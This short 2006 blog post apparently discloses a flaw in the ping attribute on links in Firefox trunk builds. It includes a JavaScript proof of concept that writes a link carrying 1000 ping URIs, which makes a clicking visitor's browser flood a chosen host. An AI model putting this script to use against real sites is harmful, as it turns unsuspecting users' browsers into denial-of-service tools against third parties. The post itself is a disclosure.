Mon, 14 Aug 2006
firefox's new <a ping> vuln^H^H^H^Hfeature
As seen recently on slashdot, one of the latest trunk builds of Firefox contains support for the ping attribute on anchor and area tags (spec). Ideally, this feature will allow websites to contain links such as:
After looking into it a bit more, I found a way to trigger a user's Firefox to SYN flood any given host upon clicking a link.
<a href="http://foo" ping="http://bar">biz</a>
<script language="JavaScript">
document.write('<a href="http://foobar" ping="');
for (var i = 0; i < 1000; i++)
document.write('URI ');
document.write('">Weeee!</a>');
</script>
posted at: 13:49 | link | | 0 comments

